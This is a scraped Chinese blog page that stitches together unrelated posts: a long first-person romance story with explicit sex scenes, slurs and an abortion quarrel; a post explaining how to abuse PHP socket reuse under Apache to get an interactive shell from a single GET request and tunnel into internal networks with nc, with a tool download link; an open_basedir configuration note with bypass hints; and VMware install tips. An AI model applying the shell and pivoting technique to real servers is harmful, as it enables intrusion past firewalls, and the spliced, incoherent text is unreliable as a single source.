我一面问路一面欣赏着校园的景色，最后我到了苏枂的楼下，没看见苏枂。我又打电话给苏枂：“宝贝怎么还没下来？我都到了。”苏枂哈哈大笑，说道：“哪有啊？我都没看见你！”我说：“那要不要我喊一声呢？”苏枂说：“你喊啊！”我说：“好，你仔细听着。”说完我挂了电话，点了根烟，运了口气，大声吼道：“苏枂你给我听着！五分钟之内给我下来！我在这等你！”吼完之后，周围的人都在看我，像看神经病一样。结果还没到五分钟，苏枂下来了。一看见我，苏枂呆立在原地，仿佛不敢相信。我伸开双臂：“不来抱抱我么？”然后苏枂立马跑到我身边，一下子跳进我怀里。我问苏枂：“感觉怎么样？有什么要对我说的么？”苏枂吻了我一口，非常兴奋与激动地说道：“我爱你！”

我们在苏枂的学校里散步，苏枂一直给我介绍她学校的这里那里。我看着苏枂，看得出来她是真的开心。晚上的时候，苏枂拿着饭卡带我去食堂吃饭，说是让我感受一下她们学校食堂的手艺，的确很好吃，我吃了很多。然后我们继续散步，我抽着烟，像个小混混，苏枂牵着我的手。中间碰见一个男的，应该是苏枂的同学，戴着眼镜，跟韩国人一样。那个男的问苏枂：“嗨！苏枂！今……今晚我约你去看电影你怎么不去啊？你不是说你生病了么？这个男生是谁啊？”苏枂有点尴尬。我心里不爽了。但是我仍然很有礼貌地上前和他握手，我说：“你好！”那个男生结结巴巴地说：“哦！你……你好！”我说：“滚蛋吧！”男生说：“什么？！”我说：“我叫你滚蛋！你约苏枂看电影是吧？我现在就带她去看电影！”男生听了，挣脱开我的手，一溜烟没影子了。那个男的走后，苏枂看着我：“霸道！”我迎着苏枂的目光：“怎样？”苏枂低着头，说：“不怎样……”我一把搂过她：“不怎样是怎样？！”苏枂看着我的眼睛，认真地说道：“喜欢……”

那晚我们在苏枂学校旁边的宾馆。因为很久没见了（其实也没多久，就一个月。）我们一进门就缠绵在一起。苏枂撕开我的衣服，我推下苏枂的黑丝。整个房间弥漫着幸福与诱惑的味道。我不停地冲击着，苏枂不停地迎合着。最后我们疲惫地相拥在一起，苏枂紧紧搂着我的脖子，吻我。

我靠在床上，苏枂贴在我胸口。我抽着烟，苏枂问我：“怎么想到突然就来看我？”我说：“想你了。”苏枂说：“到现在我都不敢相信这是真的。”我没说话。苏枂说：“我在你心里真的这么重要么？”我说：“废话。”苏枂又说：“那我在你心里会一辈子都这么重要么？”我说：“你说呢？”苏枂叹了口气：“我对自己没信心。”我说：“我对你有信心。”然后苏枂笑了，吻了我。

我在北京呆了三天，最后一天中午，苏枂陪我吃了饭，送我到车站。临进站时，苏枂搂住我，吻我，然后说：“亲爱的，好好照顾自己，我很快就回去了。”我说我知道。然后我检票进站，走了很远，还看见苏枂站在门窗外看着我。
回到家，一切照旧，每天朝九晚五，有事和苏枂通电话发信息。苏枂说她这段时间很忙，所以我们联系的也不是很多。而我们公司在招新，我也很忙。招新面试那天，我是七位面试官中的一个，主要负责面试报考我这个部门的人。本来应该是部门经理面试，可是他出国腐BAI去了，只得我来。面试那天，我早早地到了公司，坐在会议室里，手里拿着面试人员的名单和基本资料，参加面试的一共6个人，最终会有2个人进入我们公司。上午9点，面试开始。

前3个前来面试的都是男的，有的还比我大，我问了一些基本资料以及对我们公司的了解，然后确定了1个人。第4个进来的是一个女孩，我看了看资料，她叫白静婕，是个面容姣好的女孩子，个子和苏枂一样高，进来时穿着粉红色的hellokitty，很可爱。不过她给我的感觉并不好，因为这毕竟是面试，而她穿得一点儿也不正式，反而像个乖乖的学生一样。但是没办法，她的简历上被划了提子，也就是说她是内定的，是我们白总的侄女儿，今天来面试也只是走个过场。我简单问了她对我们公司的了解，她倒好，直接说：“老师，我对公司没什么了解。只是我叔叔说这里不错，就叫我来了……”她话没说完我便打断她：“打住！你出去吧。”然后她愣了一下，还是出去了，刚出去，她又回来了：“老师，我能过吧？”我看着她没说话。她又说：“老师你让我过吧，不然多丢人呀！这是我毕业后第一次求职……”我笑了笑：“你过了。”听我这样说，她的脸上立刻绽放出笑容，很美。我心想：“你是白总的侄女儿，我能不让你过么！”

一周之后，新员工正式上班了。我坐在办公室里，经理还没回来。我像两位新员工介绍着日常的一些工作。白静婕的办公桌和我面对面，听我介绍完了之后，白静婕干劲十足地问我：“老师！现在有什么要我做的？”我说：“别喊我老师。我是你同事。现在没什么要忙的，你坐着休息一会儿吧，有事我喊你。”然后我泡了杯茶，坐在桌前上网，看着昨晚五大联赛的集锦。过了会儿，白静婕提着水瓶过来给我添水，我点点头，表示感谢。

之后的几个月过去了，生活还是一如既往。苏枂打电话给我说快放假了，说以放假就回到我身边。白静婕也和我混的越来越熟。那两天我心情很好。下午来到公司，老总通知我搞个材料，任务量很大，下班时我还没做完。最后我问白静婕：“晚上有没有空？”白静婕竟然脸红了，问我：“什么事啊……”我皱了皱眉头，说道：“有空的话就跟我一起加班。”然后白静婕撅了撅嘴：“哦！”

我们一直加班到晚上九点多钟，最后终于搞完了。还剩下一篇策划，我交给白静婕，叫她晚上回家弄好，明早带来。谁知白静婕突然站起来瞪着我：“我抗议！”我愣了一下：“抗议什么？”白静婕气鼓鼓地说：“抗议我的直接领导在我生日的时候叫我和他一起加班！而且还给我布置家庭作业！”我说：“今天是你生日？”白静婕说：“是呀！我的简历你不是有么！上面不是写的清清楚楚！你没留意？”我笑了：“你的生日和我有什么关系？我为什么要留意？”白静婕说：“今晚本来我的好朋友们帮我庆生，结果你一句话叫我加班，我都推了！现在陪你加班到现在，你一句生日快乐都没对我说，还给我布置家庭作业！”我看着气鼓鼓的白静婕，觉得她很可爱。最后我说：“好了，生日快乐，你可以下班了，这个策划我来做。”

然后白静婕坐在椅子上，瞪着我。我看着她：“你回家吧，别在这坐着了。”白静婕却说：“我饿了！饿得都起不来走不动了！”我说：“那应该怎么办呢？”白静婕说：“你带我去吃东西！给我过生日！”正好当时我也饿了，于是便说：“好吧，我们走。”白静婕一下子跳到我身边：“真的啊！师父真好！我们去哪吃？”我说：“你定吧。”白静婕说：“我要去吃日本料理！”

到了公司旁边的日本料理店，我们找了个座位坐下，白静婕点了吃的，有寿司，三文鱼等等，我只点了一份乌冬面和一壶清酒。菜上来之后，白静婕也要了壶清酒。我问她：“你也喝酒？”白静婕像我做了个鬼脸：“你喝我也喝！再说今天是我生日！我最大！你不许管我！”然后我们举杯，我祝白静婕生日快乐。不得不说，清酒对我来说还是太淡了，不过那种清香味让我觉得很舒服。一壶清酒喝完，我又要了一壶。而白静婕已经有点喝多了。这是我第一次看见有人喝了一壶清酒就醉了的。我点了根烟，这时服务生过来给我举了个躬，对我说：“这里不许抽烟！”我看了看服务生，对他说：“这不是你说的算的。”然后那个服务生愣了一下，走了。转过头来，我发现白静婕侧趴在桌子上，头枕在胳膊上，在看我，带着可爱的笑。我弹了弹烟灰，问白静婕：“干嘛这么看着我？”白静婕又笑了，然后说了两个字：“痞子！”

吃完饭，我对白静婕说我送你回家吧。白静婕说：“然后呢？”我说：“然后我回公司继续加班。”白静婕说：“我陪你一起回公司吧。现在不想回家。”于是我们一起回到了办公室。加班时，我在做策划，白静婕坐在我旁边，她说她要学学。过了一会儿，我点了根烟。白静婕问我：“师父你怎么抽这么多烟？没人管你么？”我没说话。然后她问我：“师父，你有女朋友么？”我说：“问这个干嘛？”白静婕坏兮兮地笑道：“我给你介绍一个女朋友好不好？你一定喜欢！”我说：“谁啊？”白静婕说：“那个女孩呢，不是美女，但是长得绝对不丑，个子也不矮，性格很好，会做家务，洗衣做饭都会，而且挺喜欢你的，喜欢你工作时的一丝不苟，也喜欢你偶尔的坏！”我笑了笑，说：“谢谢。麻烦你帮我转告那个白小姐，我已经有女朋友了。”白静婕撅着嘴：“你怎么知道那个人是我啊！”我反问：“不是你么？！”白静婕低下头：“是我，是我还不行么……你真的有女朋友了？她是做什么的啊？”我说：“她在北京，读研究生。”白静婕说：“切！那么远！又不能陪你！”我说：“现在只是暂时的远，以后会永远陪在我身边。”见我这样，白静婕不说话了。

策划终于弄完了，我和白静婕走出办公室，我关了灯，办公室里顿时漆黑一片，只有巨大的落地窗外五光十色的夜景璀璨光亮。我正准备关门，白静婕一把将我向里一推，然后她顺手带上门，将我按着靠在墙上。白静婕搂住我的腰，将头埋在我胸口。我很冷静，对她说：“你喝多了。”白静婕说：“是！我喝多了！”我说：“放手，这不是你应该做的事。”白静婕不放，也不说话。黑暗中我听见白静婕的呼吸，很快，很急促。她确实喝多了。我说：“不要浪费我的时间。”白静婕却说：“不要无视我对你的喜欢！”我说：“无视又怎样？！”白静婕说：“这不是说的算的！”我说：“不要学我说话。”白静婕说：“我偏要！从小到大我想要的东西，不管怎样我都能得到！你是我第一个喜欢上的男人！”我说：“那又怎样？！”白静婕说：“我要得到你！”听了这话，我直接推开白静婕，没留一点余地：“滚开。”然后我开了门，直接走了，没再管她。回家的路上，我想了想今晚的事。第一，我不喜欢白静婕，如果和她有交集，最多就是我GAN她一PAO。第二，这种女人我不能碰，她是我老总的侄女儿，搞她是大忌。想到这里，我点了根烟，给苏枂打电话。电话通了。我问苏枂干嘛呢？苏枂说：“同学过生日！先不说了！结束了打给你！”还没等我说完，苏枂便挂了电话。结果那晚苏枂再也没打电话过来。

第二天上班，一进办公室，便看见白静婕坐在她的桌前。见我进来了，白静婕脸红了，低着头不看我。我走到桌前，准备拿杯子泡茶，却看见茶已经泡好了。我看了看白静婕，她还是低着头，满脸通红，看起来很可爱。我坐下，上网，找资料，写文件。我们俩就这样，一直到中午。中午时，我下班出了办公室，锁上门。白静婕已经先走了。我在公司下面随便吃点，然后回家。刚到家门口，看见白静婕在门口站着等我。我走到她面前：“你来这里干嘛？”白静婕说：“你家怎么没人？”我说：“废话！我还没回来有什么人？！”白静婕：“哦……”进了家门，我叫白静婕坐，然后给她倒了杯水。白静婕喝了水，定了定神，对我说：“师父，我真的喜欢你。”我说：“嗯，然后呢？”白静婕说：“然后我希望你能接受我。”我说：“幼稚！”白静婕说：“我知道你有女朋友，我也知道了你女朋友以前是什么样的人。我哪点比不过她？！”我看着白静婕：“你想说什么？”白静婕说：“我想说，我追求我喜欢的你，这没错吧？而你却一点机会都不给我！”我说：“不要混淆概念。这不是给不给机会的事。”白静婕低下头，喃喃说道：“对啊，你都可以给一个BIAO子机会，却不能给我机会……”听了这话，我火了，对白静婕说：“你再说一遍？！谁是BIAO子？！”白静婕看着我：“我说错了吗？！”我不想再跟她废话下去，便对她说：“我要午睡了，你走
吧。以后我不想听见BIAO子这两个字！”

我躺在床上，感觉很累。没有苏枂在身边的时间，我的笑容渐渐地少了。其实心里很矛盾，我不想再这样对苏枂无止尽地深陷下去，因为苏枂其实给不了我安全感，但是我却控制不住心里的想法。看着手机里我和苏枂的照片，看着我们俩幸福的笑容，感觉却很遥远。就这么，我睡着了。

晚上喊鸭子出来喝酒。酒是一个好东西，喝了它，痛苦就会减轻，喝醉了，就会暂时忘记一些烦恼。但是酒也是个坏东西，当你酒醒之后，你会发现，经过酒精的作用，那些痛苦会变得更大，那些烦恼依然存在。鸭子见了我，说：“你现在怎么这么喜欢喝酒？”我说：“叫你陪我喝你就陪我喝！少TM废话！”然后我们一人一箱啤酒，一瓶一瓶地喝了起来。最后鸭子吐了，喝不下去了。我也吐了，吐完之后继续喝。中间我给苏枂打电话，苏枂说昨晚结束的晚，忘了给我打电话。我说没事。苏枂说：“你在干嘛呢？”我说：“我在喝酒。”苏枂说：“为什么喝酒啊？”我愣住了，不知该怎么说。这时喝多了的鸭子突然抢过我的手机，对着手机口齿不清地喊着：“臭BIAO子！MLGBD！你看我兄弟被你折腾成什么样子了！CAO！”喊完之后鸭子瘫坐在墙角。我推开鸭子，拿回手机，挂了电话，而苏枂也没有再打过来。
第二天是周末，睡到中午才醒来，看见手机有两条信息，一条是苏枂的，一条是白静婕的。我直接忽略了白静婕的信息，打开了苏枂的信息：“亲爱的，我知道你怨恨我的冷漠，但是请你理解我。你给的幸福来得太快，让我措手不及，只有逃避。我从不相信任何男人，但却选择相信你。可是我已经没有爱你的勇气。我不知道该怎么办。但是请你相信我，我苏枂会对得起你。下周我放假，我回去陪你。”看了信息，我觉得很幸福。下周苏枂就回来了！

好不容易一周过去了，我特地请了三天假，然后去火车站接苏枂。我站在出站台门口，苏枂出来一看见我，便跑过来紧紧抱住了我。坐在出租车上，我们的手紧紧牵在一起。回到家，我们便交织在一起。我们不停地做AI。晚上时我们出去吃饭散步，回来接着做AI。最后我们靠在床边，苏枂对我说：“对不起。”我搂着苏枂的肩膀：“傻瓜。”苏枂说：“你会一直等我么？还有一年半，我毕业了就跟你回家乡，然后我们结婚。”我说：“我会的。只要你别放弃。”苏枂说：“我怎么放弃？不管过去怎样，只要你不嫌弃我，未来我就只是你一个人的。”然后我们接吻，不停地接吻。

那三天，我们几乎都在家里，除了睡觉就是做AI，第四天上午，我送苏枂上了回北京的火车。火车开动时，苏枂从窗户向我招手，对我喊着：“等我啊！”我站在原地，笑着望着远去的苏枂。心里洋溢着幸福踏实的味道。

差不多一个月之后，我在睡觉时，苏枂打电话给我，问我在干嘛。我说在睡觉。苏枂说：“跟你说件事，我好像怀孕了……”我愣了一下：“好啊！你什么时候回来？我们结婚！”苏枂却说：“不，我想把孩子打掉。”这句话让我无法理解。我说：“你神经病啊！把孩子打掉干嘛？！那是我们的孩子！”苏枂说：“我好不容易考研来到北京，我不想因为怀孕而放弃一切。”我说：“研究生难道比我们的孩子还重要么？！”苏枂坚定地说：“是！”我无言以对，这个女人是疯子！苏枂挂了电话，我再打，她又挂了，第三次打时，她关机了。我抽了根烟，定了定神，对自己说：“不行，我必须去北京！”

12个小时的辗转，我第二次来到苏枂的学校。我来到她的宿舍楼前，打她电话，她接了。我说我在你宿舍下面，你下来。五分钟之后，她下来了。看见我，她就像做错事一样，不敢看我的眼睛。我们先去吃饭，然后去了宾馆。我和她坐在床边，我问她：“你到底是怎么想的？”苏枂不说话。我说：“你怀孕了，怀的是我们的孩子，你忍心把他杀了么？！”苏枂摇摇头。我说：“那你为什么准备去堕胎？！你想过我的感受么？”苏枂看着我，眼中带着复杂的情绪。我说：“苏枂我爱你，希望你别再糊涂了，跟我回家，跟我结婚，难道你不愿意么？”苏枂叹了口气，终于说话了：“我愿意，我想嫁给你，我希望你能娶我，但是这个孩子我不会要的，我不能因为他而耽误我研究生的学业。我们可以等我毕业了再结婚，然后我们好好准备，好好生一个孩子。”我说：“不可能。你不能去堕胎。”然后我抽烟，苏枂沉默。最后，苏枂说了一句让我伤透心的话：“亲爱的，要么你让我堕胎，要么我们分手。”我看着苏枂，觉得心好疼，像是被人捏住一样。耳边隐约听见某种东西崩塌的声音。我觉得很无力。最后苏枂说：“我晚上还有实验，先回去了，如果结束得早再来陪你。”

北京的夜晚很冷。到了火车站，买了票，我上了火车。火车轰隆隆的声音碾碎我所有的牵挂。我自由了。
第二天早晨我回到家。直到我到家，苏枂也没有打电话给我。回家之后我睡觉。下午时，苏枂打电话给我了：“你在哪？”我说：“家。”苏枂说：“你疯啦？！来北京四个小时就回去？！你不陪我去堕胎么？！”我没说话。苏枂说：“下周你来北京陪我堕胎，我要你陪我去！”这个女人是多么无理。我连咬牙切齿的力量都没了。我说：“我还是那句话，不想你堕胎，这就是我一直的态度，你自己作决定吧。”然后苏枂挂了电话。

晚上和鸭子喝酒，跟他说了这事。出乎我的意料，鸭子没有嘲笑我也没有骂苏枂，只是喝了口酒，说：“我早知道你们会有这么一天。兄弟，你挺不容易的。今晚就喝酒，喝完酒去搞女大学生！别的什么都不说！你也该自由了！”我没说话，表情冷若冰霜。那晚我们依旧喝了很多很多酒。我喝醉了，鸭子扶我去宾馆，然后他打电话喊来了两个女孩，我们一人一个。鸭子带他怀里的女孩去隔壁房间了，我和身边的女孩去洗澡，然后上床做了起来。刚开始没多久，我的电话响了。

“喂，我明天去堕胎。”
“嗯。”
“不要你陪我。”
“不会，别打扰我。”
挂了电话，耳边仍然回荡着苏枂充满诱惑力的声音，我看了看手机，已经11点了。明天苏枂就去堕胎了，而今晚的我却和别的女人在一起。昏暗的灯光，迷人的香水，光滑的皮肤，还有充满力量的撞击。直到我倾泻而出，我忽然想到，明天苏枂真的要去堕胎了，而她肚子里的孩子，是我的。

我靠在床头，感觉那么的无力。还能说什么呢？我宁愿从未认识过苏枂！最后我睡去了。窗外的黑暗，像是一张张触手，将沾满阳光的梦想一一撕碎。迷醉间，我仿佛又看见了苏枂，苏枂紧紧地抱着我，对我说：“你在这里，我能去哪？”

相关文章

• 2011年09月16日 -- 给你一个刘易阳又如何
• 2011年06月24日 -- 最近的生活
• 2010年12月3日 -- 公安部专项行动破180起黑客攻击案 460余人落网
• 2010年09月7日 -- 外星人致地球人的一封信(关于UFO的推断和联想)
• 2010年07月17日 -- 你到底要做我丈夫还是姐夫！
• 2010年07月9日 -- 《南都周刊》：红客变身 黑客隐去
• 2010年06月13日 -- 我眼中的韩国—出自北大中文系教授孔庆东
• 2010年06月5日 -- 即兴大发 吟诗一首
• 2010年06月3日 -- 张立申致周鸿祎的信 卡巴劝你回头是岸
• 2010年04月30日 -- 安全研究人员分类

结 合这两点，由于php本身的一种运行方式是以apache的mod方式在apahe进程中存在的，所以对于php来说，他的自身进程也就是apache的 进程，所有apache原来在root下打开的文件描述符，他都能操作。于是乎，原有修补完毕的漏洞，经过PHP新功能的妙手回春，又重现江湖了。

那么究竟如何利用这个漏洞呢？在之前的那篇文章里， 我曾经给出了一个例子，就是直接复用当前连接80端口的socket，生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket 的实现，但实际上，在写文章的时候，我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法：

但当时的例子已经不能在apache补丁后使用了，因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情，因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理，不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此，我只要手工实现netstat的功能即可。那netstat又是如何实现的呢？

实 际上，netstat本身也是通过读取系统中的/proc/net/tcp(6)文件来实现对当前网络状态的监控输出的。我们只要依样画葫芦对此文件进行 解析（主要是合并ipv4和ipv6的内容，然后从16进制转换成字符串形式的ip，端口），然后再比对一下，只要发现此socket的远程ip和端口和 php中的$_SERVER['REMOTE_ADDR']，$_SERVER['REMOTE_PORT']相匹配即可。具体实现如下：

ok，FD一找到，剩下的就是生成bash了。这里也不能老样子使用system，得换一下使用proc_open（为什么自己想）。具体代码就不写了。直接上效果：

只要简单的一个GET，就可以直接获取交互式shell，穿透防火墙哦亲~

上 篇文章中还提到利用此方法可以做内网的端口转发，从而一个80端口走遍内网。不过当时没有给出实现，其实也非常简单，只需要将bash换成nc就可以了。 不过这里需要多加一个slave端，在本地监听端口，让本地程序连接此端口，然后在数据发送前，加上一个GET请求，然后直接转发即可。我这里也给一下效 果：

首先在本地执行一下slave程序，我这里是自己写的一个python脚本，pr.py。

第 一个参数为我们的脚本地址，第二个参数就是想要转发的目标地址了。我这里用的是target的22端口，实际上可以是他任意的内网地址。执行 后，pr.py就会在我的机器本地监听1234端口，等待其他程序连接了。所有发送到本机1234的数据都会被转发到target的22端口中。

看，网络连接中可以很清晰的看到我们的nc程序正在忠实的进行这转发操作，而我们的ssh连接也一切正常。
稳定，舒适，一个80端口一个连接，内网任我行。

具体实现，我放到下面了。如果你还有兴趣，就自己研究一下吧。例如多一个sock5代理，甚至只要给nc加一个参数就可以了。

下载地址：

http://www.4shell.org/tools/php_port_reuse.zip

相关文章

• 2011年12月3日 -- php open_basedir设置以及关于安全
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2011年04月30日 -- Linux下Apache与PHP安全相关设置
• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2009年11月23日 -- php.ini文件A级变态配置
• 2009年04月17日 -- php导出oracle库的php代码
• 2009年01月24日 -- 猥琐流之php反弹
• 2008年12月9日 -- Php注入点构造
• 2008年11月16日 -- dedecms plus/infosearch.php Exploit

Apache+PHP配置方法有三种：
方法一：在php.ini里配置
open_basedir = .:/tmp/

方法二：在Apache配置的VirtualHost里设置(httpd-vhosts.conf)
php_admin_value open_basedir .:/tmp/

方法三：在Apache配置的Direcotry里设置
php_admin_value open_basedir .:/tmp/

关于三个配置方法的解释：
a、方法二的优先级高于方法一，也就是说方法二会覆盖方法一；方法三的优先级高于方法二，也就是说方法三会覆盖方法二；
b、配置目录里加了“/tmp/”是因为php默认的临时文件（如上传的文件、session等）会放在该目录，所以一般需要添加该目录，否则部分功能将无法使用；
c、配置目录里加了“.”是指运行php文件的当前目录，这样做可以避免每个站点一个一个设置；
d、如果站点还使用了站点目录外的文件，需要单独在对应VirtualHost设置该目录；

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
这里是我实验的一个例子,设置了两个host，当然一块把Apache设置vitualHost的方法也列出了：

#虚拟主机配置文件

NameVirtualHost *:80

#简单设置模式
<VirtualHost *:80>
ServerAdmin admin@8100.cc
DocumentRoot "C:/AWEB/phproot/test"
ServerName localhost
#ServerAlias www.test.com
ErrorLog "logs/error.log"
CustomLog "logs/access.log" common
</VirtualHost>
#详细设置模式
<VirtualHost *:80>
ServerAdmin admin@cc.cc
DocumentRoot "C:/AWEB/phproot/test2"
ServerName www.test2.com
# php_admin_value open_basedir C:/AWEB/phproot/test2/;C:/windows/temp/     放在这里也可以
<Directory "C:/AWEB/phproot/test2">
Options Indexes FollowSymLinks
AllowOverride Options FileInfo
Order allow,deny
Allow from all
DirectoryIndex index.htm index.html index.php
php_admin_value open_basedir c:/AWEB/phproot/test2/;C:/windows/temp/
</Directory>
Alias /phpmyadmin "C:/AWEB/phpMyAdmin/"
<Directory "C:/AWEB/phpMyAdmin">
AllowOverride AuthConfig
Order allow,deny
Allow from all
</Directory>
ErrorLog "logs/error.log"
CustomLog "logs/access.log" common
</VirtualHost>

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
最后转军神的那两句话：

一、open_basedir中处理文件路径时没有严格考虑目录的存在，这将导致本地包含或者本地文件读取的绕过（合并/aaa/../../导致linux的目录检查作废）。

二、open_basedir的值配置不当，有可能导致目录跨越（配置时忘记目录最后的斜杠 / ）。

相关文章

• 2011年12月3日 -- PHP端口复用的利用
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2011年04月30日 -- Linux下Apache与PHP安全相关设置
• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2009年11月23日 -- php.ini文件A级变态配置
• 2009年04月17日 -- php导出oracle库的php代码
• 2009年01月24日 -- 猥琐流之php反弹
• 2008年12月9日 -- Php注入点构造
• 2008年11月16日 -- dedecms plus/infosearch.php Exploit

Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好

Searching for a valid kernel header path...
The path "" is not valid.
Would you like to change it? [yes]
如果出现这个就表示kernel-devel包没有安装

yum install kernel-devel

成功安装VMware tools时的提示：
Searching for GCC...
Detected GCC binary at "/usr/bin/gcc".
The path "/usr/bin/gcc" appears to be a valid path to the gcc binary.
Would you like to change it? [no]

Searching for a valid kernel header path...
Detected the kernel headers of the running kernel at
"/lib/modules/2.6.32-71.el6.i686/build/include".
The path "/lib/modules/2.6.32-71.el6.i686/build/include" appears to be a valid
path to the kernel headers of the running kernel.
Would you like to change it? [no]

相关文章

• 2011年06月10日 -- VMware 硬盘扩容
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试